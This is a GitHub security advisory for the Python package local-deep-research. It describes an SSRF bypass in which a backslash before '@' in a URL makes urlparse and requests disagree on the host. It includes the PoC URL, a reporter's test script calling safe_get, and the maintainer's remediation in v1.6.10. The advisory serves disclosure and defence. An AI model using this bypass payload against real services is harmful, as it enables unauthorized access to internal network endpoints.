GHSA-G23J-2VWM-5C25
Vulnerability from github – Published: 2026-05-28 19:18 – Updated: 2026-05-28 19:18
Summary
The URL validation logic in local-deep-research has a logic flaw that lets attackers bypass it, leading to SSRF attacks.
Details
The current project uses validate_url to validate the input URL. The main logic is to perform security checks on the host portion of the URL extracted by urlparse to prevent SSRF attacks.
However, urlparse and the library that actually sends the request parse URLs differently. For example, safe_get first calls validate_url to perform the SSRF check and then calls requests.get to send the actual request.
The core issue: urlparse() and requests disagree on which host a URL like http://127.0.0.1:6666\@1.1.1.1 points to:
- urlparse() treats \ as a regular character and @ as the userinfo-host delimiter, so it extracts hostname as 1.1.1.1 (public)
- requests treats \ as a path character, connecting to 127.0.0.1 (internal)
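The disagreement can be reproduced with the standard library alone. The sketch below compares urlparse with a simplified authority splitter. The function client_style_host and its regex are hypothetical stand-ins modeled on the behavior this advisory attributes to requests (the authority ends at a backslash); they are not the library's actual code, and they ignore IPv6 literals.

```python
import re
from typing import Optional
from urllib.parse import urlparse

# The advisory PoC; the backslash is escaped so Python keeps it literally.
POC_URL = "http://127.0.0.1:6666\\@1.1.1.1"

# Hypothetical stand-in for the HTTP client's parser: the authority stops at
# the first "/", "\", "?" or "#". Assumption for illustration only.
_AUTHORITY_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://([^\\/?#]*)")


def validator_style_host(url: str) -> Optional[str]:
    """Host as seen by a validator built on urllib.parse.urlparse."""
    return urlparse(url).hostname


def client_style_host(url: str) -> Optional[str]:
    """Host as seen by a parser that ends the authority at a backslash."""
    match = _AUTHORITY_RE.match(url)
    if match is None:
        return None
    # Drop any userinfo, then drop the port (IPv4 and names only).
    hostport = match.group(1).rpartition("@")[2]
    host = hostport.partition(":")[0]
    return host or None


if __name__ == "__main__":
    print("validator sees:", validator_style_host(POC_URL))
    print("client sees:   ", client_style_host(POC_URL))
```

For an ordinary URL such as http://127.0.0.1:6666/ both functions return the same host; they diverge only when the backslash appears before the @.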
Below is a test script I wrote against the project code.
#!/usr/bin/env python3
"""Standalone demo: import project via absolute path and call safe_get."""

from __future__ import annotations

import importlib.util
import enum
import sys
import types
from pathlib import Path

# Hardcoded absolute path to the project's "src" directory.
SRC_ROOT = Path(
    r"d:\BaiduNetdiskDownload\local-deep-research-main\local-deep-research-main\src"
)

# Python 3.10 compatibility:
# project constants import StrEnum (available in Python 3.11+).
if not hasattr(enum, "StrEnum"):
    class _CompatStrEnum(str, enum.Enum):
        pass

    enum.StrEnum = _CompatStrEnum  # type: ignore[attr-defined]


def _load_safe_get():
    """Load safe_get directly from file, bypassing package __init__ imports."""
    ldr_pkg_name = "local_deep_research"
    security_pkg_name = "local_deep_research.security"

    # Build lightweight package modules so relative imports in safe_requests.py
    # resolve without executing package __init__.py files.
    if ldr_pkg_name not in sys.modules:
        ldr_pkg = types.ModuleType(ldr_pkg_name)
        ldr_pkg.__path__ = [str(SRC_ROOT / "local_deep_research")]  # type: ignore[attr-defined]
        sys.modules[ldr_pkg_name] = ldr_pkg

    if security_pkg_name not in sys.modules:
        security_pkg = types.ModuleType(security_pkg_name)
        security_pkg.__path__ = [str(SRC_ROOT / "local_deep_research" / "security")]  # type: ignore[attr-defined]
        sys.modules[security_pkg_name] = security_pkg

    module_name = "local_deep_research.security.safe_requests"
    module_path = SRC_ROOT / "local_deep_research" / "security" / "safe_requests.py"

    spec = importlib.util.spec_from_file_location(module_name, module_path)
    if spec is None or spec.loader is None:
        raise ImportError(f"Cannot load module from {module_path}")

    module = importlib.util.module_from_spec(spec)
    sys.modules[module_name] = module
    spec.loader.exec_module(module)
    return module.safe_get


safe_get = _load_safe_get()


def main() -> None:
    # Hardcoded URL for demonstration.
    url = "http://127.0.0.1:6666"
    # Bypass variant; the raw string keeps the backslash literal and avoids
    # Python's invalid-escape warning for "\@".
    # url = r"http://127.0.0.1:6666\@1.1.1.1"

    safe_get(url, timeout=15)


if __name__ == "__main__":
    main()
When an attacker uses http://127.0.0.1:6666/, the existing detection logic recognizes it as an internal network address and blocks it.
However, when an attacker uses http://127.0.0.1:6666\@1.1.1.1, the detection logic resolves the host to 1.1.1.1, a public IP address, so the URL passes validation. When the request is actually sent, requests.get connects to http://127.0.0.1:6666, bypassing the check and achieving an SSRF attack.
PoC
http://127.0.0.1:6666\@1.1.1.1
Impact
SSRF
Maintainer note (2026-05-15)
Thanks @Fushuling and @RacerZ-fighting for the detailed report. The remediation
spans four PRs, all merged to main and shipped in v1.6.10:
#3873 (merged 2026-05-08) — the load-bearing fix for the parser-differential
bypass:
- New RFC_FORBIDDEN_URL_CHARS_RE in security/ssrf_validator.py rejects
URLs containing backslash, ASCII control bytes, or whitespace — RFC 3986
forbids these and their presence signals a parser-differential attempt.
- Host extraction switched from urllib.parse.urlparse(url).hostname to
urllib3.util.parse_url(url).host. urllib3 is the parser requests
uses internally, so the validator and the HTTP client now agree on the
destination by construction — closing the \@ divergence that drove the
PoC.
- Same two-layer defence applied to NotificationURLValidator.validate_service_url.
- 53 new tests across test_ssrf_validator.py, test_notification_validator.py,
test_safe_requests.py, and test_ssrf_redirect_bypass.py, including the
advisory PoC http://127.0.0.1:6666\@1.1.1.1 and the post-prepare canonical
form http://127.0.0.1:6666/%5C@1.1.1.1.
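The two layers described for #3873 can be sketched roughly as follows. This is an illustration under stated assumptions, not the project's code: FORBIDDEN_URL_CHARS_RE and is_url_allowed are hypothetical names, the character class is a guess at what "backslash, ASCII control bytes, or whitespace" covers, and the second layer uses the standard-library urlparse only to keep the sketch dependency-free (the note above says the real fix extracts the host with urllib3.util.parse_url). Hostname resolution checks are omitted.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Hypothetical pattern: backslash, ASCII control bytes (0x00-0x1F, 0x7F),
# and space. Tab, CR and LF fall inside the 0x00-0x20 range.
FORBIDDEN_URL_CHARS_RE = re.compile(r"[\\\x00-\x20\x7f]")


def is_url_allowed(url: str) -> bool:
    """Return True only if the URL passes both illustrative layers."""
    # Layer 1: reject characters that signal a parser-differential attempt.
    if FORBIDDEN_URL_CHARS_RE.search(url):
        return False

    # Layer 2: extract the host and refuse non-public IP literals.
    try:
        host = urlparse(url).hostname
    except ValueError:
        return False
    if not host:
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal; a real validator would resolve and check it.
        return True
    return addr.is_global


if __name__ == "__main__":
    for candidate in (
        "http://127.0.0.1:6666\\@1.1.1.1",    # advisory PoC
        "http://127.0.0.1:6666/%5C@1.1.1.1",  # post-prepare canonical form
        "http://1.1.1.1/",
    ):
        print(candidate, "->", is_url_allowed(candidate))
```

The first layer alone stops the PoC. The second layer matters for the canonical form, which contains no forbidden character but still points at a loopback address.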
#3882 (merged 2026-05-08) — hardens the metadata-IP block and redacts userinfo from log output so rejected URLs don't leak credentials to logs.
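As a rough illustration of userinfo redaction before logging, the sketch below replaces everything before the last @ in the network location with a placeholder. The function name redact_userinfo and the "***" placeholder are assumptions made for this example; the project's actual redaction logic is not shown in this advisory.

```python
from urllib.parse import urlsplit, urlunsplit


def redact_userinfo(url: str) -> str:
    """Return the URL with any user:password@ part replaced by ***@."""
    try:
        parts = urlsplit(url)
    except ValueError:
        # Malformed input: log a fixed marker rather than the raw string.
        return "<unparseable URL>"
    if "@" not in parts.netloc:
        return url
    hostport = parts.netloc.rpartition("@")[2]
    return urlunsplit(parts._replace(netloc="***@" + hostport))


if __name__ == "__main__":
    print(redact_userinfo("https://user:secret@example.com:8443/path?q=1"))
```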
#3889 (merged 2026-05-09) — locks in real-world URL fixtures and behavior invariants from #3873/#3882 as regression tests.
#3932 (merged 2026-05-10) — blocks IPv6 transition prefixes (2002::/16
6to4, 64:ff9b::/96 NAT64, 2001::/32 Teredo, 100::/64 discard) so private
IPv4 destinations cannot be reached via an IPv6-wrapped form. NAT64 has an
operator opt-in (LDR_SECURITY_ALLOW_NAT64=true) for IPv6-only deployments,
but cloud metadata IPs remain blocked regardless.
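A prefix check of this kind can be sketched with the standard ipaddress module. The prefixes are the four listed above; the names TRANSITION_PREFIXES, transition_prefix, and nat64_embedded_ipv4 are hypothetical, and the sketch leaves out the LDR_SECURITY_ALLOW_NAT64 opt-in and the metadata-IP handling.

```python
import ipaddress
from typing import Optional

# The four transition prefixes named in the note for #3932.
TRANSITION_PREFIXES = {
    "6to4": ipaddress.ip_network("2002::/16"),
    "NAT64": ipaddress.ip_network("64:ff9b::/96"),
    "Teredo": ipaddress.ip_network("2001::/32"),
    "discard": ipaddress.ip_network("100::/64"),
}


def transition_prefix(host: str) -> Optional[str]:
    """Return the name of the matching transition prefix, or None."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None  # not an IP literal
    if addr.version != 6:
        return None
    for name, network in TRANSITION_PREFIXES.items():
        if addr in network:
            return name
    return None


def nat64_embedded_ipv4(host: str) -> ipaddress.IPv4Address:
    """Extract the IPv4 address carried in the low 32 bits of a /96 NAT64 address."""
    addr = ipaddress.IPv6Address(host)
    return ipaddress.IPv4Address(int(addr) & 0xFFFFFFFF)


if __name__ == "__main__":
    wrapped = "64:ff9b::7f00:1"
    print(transition_prefix(wrapped), nat64_embedded_ipv4(wrapped))
```

The example address 64:ff9b::7f00:1 shows why the block is needed: it is a syntactically public IPv6 address whose low 32 bits encode 127.0.0.1.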
Affected versions
- The specific parser-differential bypass described above exists from v1.3.0 (when validate_url was first introduced) through v1.6.9. The validator used urlparse(url).hostname for that entire span.
- Versions before v1.3.0 had no SSRF validator at all: requests went directly to requests.get() without any host check. Those versions are vulnerable to SSRF via this URL and any other internal address; the parser-differential trick is unnecessary.
In both cases the remediation is the same: upgrade to v1.6.10 or later.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "local-deep-research"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46526"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-28T19:18:34Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nThe URL checking logic in local-deep-research has a logical flaw that could be bypassed by attackers, leading to SSRF attacks.\n\n### Details\nThe current project uses `validate_url` to validate the input URL. The main logic is to perform security checks on the host portion of the URL extracted by urlparse to prevent SSRF attacks.\n\n\u003cimg width=\"1173\" height=\"1107\" alt=\"QQ20260430-212334-30-1\" src=\"https://github.com/user-attachments/assets/52b356aa-9ad3-4b1d-a472-39a2ada3ea23\" /\u003e\n\nHowever, there are indeed differences in parsing between urlparse and the library that actually sends the request. For example, in `safe_get`, `validate_url` is first used to perform an SSRF check, and then `requests.get` is used to send the actual request.\n\n\u003cimg width=\"1164\" height=\"1089\" alt=\"QQ20260430-212431-30-2\" src=\"https://github.com/user-attachments/assets/f3decb16-4daa-49e0-861c-273a913487a0\" /\u003e\n\nThe core issue: urlparse() and requests disagree on which host a URL like `http://127.0.0.1:6666\\@1.1.1.1` points to:\n\n- urlparse() treats \\ as a regular character and @ as the userinfo-host delimiter, so it extracts hostname as `1.1.1.1` (public)\n- requests treats \\ as a path character, connecting to `127.0.0.1` (internal)\n\nBelow is a test code I wrote following the code.\n```\n#!/usr/bin/env python3\n\"\"\"Standalone demo: import project via absolute path and call safe_get.\"\"\"\n\nfrom __future__ import annotations\n\nimport importlib.util\nimport enum\nimport sys\nimport types\nfrom pathlib import Path\n\n# Hardcoded absolute path to the project\u0027s \"src\" directory.\nSRC_ROOT = Path(\n r\"d:\\BaiduNetdiskDownload\\local-deep-research-main\\local-deep-research-main\\src\"\n)\n\n# Python 3.10 compatibility:\n# project constants import StrEnum (available in Python 3.11+).\nif not hasattr(enum, \"StrEnum\"):\n class _CompatStrEnum(str, enum.Enum):\n pass\n\n enum.StrEnum = _CompatStrEnum # type: 
ignore[attr-defined]\n\n\ndef _load_safe_get():\n \"\"\"Load safe_get directly from file, bypassing package __init__ imports.\"\"\"\n ldr_pkg_name = \"local_deep_research\"\n security_pkg_name = \"local_deep_research.security\"\n\n # Build lightweight package modules so relative imports in safe_requests.py\n # resolve without executing package __init__.py files.\n if ldr_pkg_name not in sys.modules:\n ldr_pkg = types.ModuleType(ldr_pkg_name)\n ldr_pkg.__path__ = [str(SRC_ROOT / \"local_deep_research\")] # type: ignore[attr-defined]\n sys.modules[ldr_pkg_name] = ldr_pkg\n\n if security_pkg_name not in sys.modules:\n security_pkg = types.ModuleType(security_pkg_name)\n security_pkg.__path__ = [str(SRC_ROOT / \"local_deep_research\" / \"security\")] # type: ignore[attr-defined]\n sys.modules[security_pkg_name] = security_pkg\n\n module_name = \"local_deep_research.security.safe_requests\"\n module_path = SRC_ROOT / \"local_deep_research\" / \"security\" / \"safe_requests.py\"\n\n spec = importlib.util.spec_from_file_location(module_name, module_path)\n if spec is None or spec.loader is None:\n raise ImportError(f\"Cannot load module from {module_path}\")\n\n module = importlib.util.module_from_spec(spec)\n sys.modules[module_name] = module\n spec.loader.exec_module(module)\n return module.safe_get\n\n\nsafe_get = _load_safe_get()\n\n\ndef main() -\u003e None:\n # Hardcoded URL for demonstration.\n url = \"http://127.0.0.1:6666\"\n # url = \"http://127.0.0.1:6666\\@1.1.1.1\"\n\n safe_get(url, timeout=15)\n\n\nif __name__ == \"__main__\":\n main()\n```\nWhen an attacker uses `http://127.0.0.1:6666/`, the existing detection logic can detect that this is an internal network address and block it.\n\n\u003cimg width=\"1694\" height=\"503\" alt=\"QQ20260430-212723-30-3\" src=\"https://github.com/user-attachments/assets/366f684d-9191-4acb-b6a2-b2c3c54f0223\" /\u003e\n\nHowever, when an attacker uses `http://127.0.0.1:6666\\@1.1.1.1`, the detection logic resolves the host to 
`1.1.1.1`, which is a public IP address, thus passing the verification. But in the actual request process, this URL is forwarded by requests.get to `http://127.0.0.1:6666`, bypassing the detection and achieving an SSRF attack.\n\n\u003cimg width=\"2424\" height=\"477\" alt=\"QQ20260430-212833-30-4\" src=\"https://github.com/user-attachments/assets/bd175e34-d833-44c5-981b-59cfad3406c3\" /\u003e\n\n### PoC\n```\nhttp://127.0.0.1:6666\\@1.1.1.1\n```\n\n### Impact\nSSRF\n\n\n\n---\n\n## Maintainer note (2026-05-15)\n\nThanks @Fushuling and @RacerZ-fighting for the detailed report. The remediation\nspans four PRs, all merged to `main` and shipped in **v1.6.10**:\n\n**#3873** (merged 2026-05-08) \u2014 the load-bearing fix for the parser-differential\nbypass:\n- New `RFC_FORBIDDEN_URL_CHARS_RE` in `security/ssrf_validator.py` rejects\n URLs containing backslash, ASCII control bytes, or whitespace \u2014 RFC 3986\n forbids these and their presence signals a parser-differential attempt.\n- Host extraction switched from `urllib.parse.urlparse(url).hostname` to\n `urllib3.util.parse_url(url).host`. 
`urllib3` is the parser `requests`\n uses internally, so the validator and the HTTP client now agree on the\n destination by construction \u2014 closing the `\\@` divergence that drove the\n PoC.\n- Same two-layer defence applied to `NotificationURLValidator.validate_service_url`.\n- 53 new tests across `test_ssrf_validator.py`, `test_notification_validator.py`,\n `test_safe_requests.py`, and `test_ssrf_redirect_bypass.py`, including the\n advisory PoC `http://127.0.0.1:6666\\@1.1.1.1` and the post-prepare canonical\n form `http://127.0.0.1:6666/%5C@1.1.1.1`.\n\n**#3882** (merged 2026-05-08) \u2014 hardens the metadata-IP block and redacts\nuserinfo from log output so rejected URLs don\u0027t leak credentials to logs.\n\n**#3889** (merged 2026-05-09) \u2014 locks in real-world URL fixtures and behavior\ninvariants from #3873/#3882 as regression tests.\n\n**#3932** (merged 2026-05-10) \u2014 blocks IPv6 transition prefixes (`2002::/16`\n6to4, `64:ff9b::/96` NAT64, `2001::/32` Teredo, `100::/64` discard) so private\nIPv4 destinations cannot be reached via an IPv6-wrapped form. NAT64 has an\noperator opt-in (`LDR_SECURITY_ALLOW_NAT64=true`) for IPv6-only deployments,\nbut cloud metadata IPs remain blocked regardless.\n\n### Affected versions\n\n- **The specific parser-differential bypass** described above exists from\n **v1.3.0** (when `validate_url` was first introduced) through **v1.6.9**.\n The validator used `urlparse(url).hostname` for that entire span.\n- **Versions before v1.3.0** had no SSRF validator at all \u2014 requests went\n directly to `requests.get()` without any host check. Those versions are\n vulnerable to SSRF via this URL and any other internal address; the\n parser-differential trick is unnecessary.\n\nIn both cases the remediation is the same: **upgrade to v1.6.10 or later.**",
"id": "GHSA-g23j-2vwm-5c25",
"modified": "2026-05-28T19:18:35Z",
"published": "2026-05-28T19:18:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/LearningCircuit/local-deep-research/security/advisories/GHSA-g23j-2vwm-5c25"
},
{
"type": "PACKAGE",
"url": "https://github.com/LearningCircuit/local-deep-research"
},
{
"type": "WEB",
"url": "https://github.com/LearningCircuit/local-deep-research/releases/tag/v1.6.10"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "local-deep-research has an SSRF bypass in `safe_get`"
}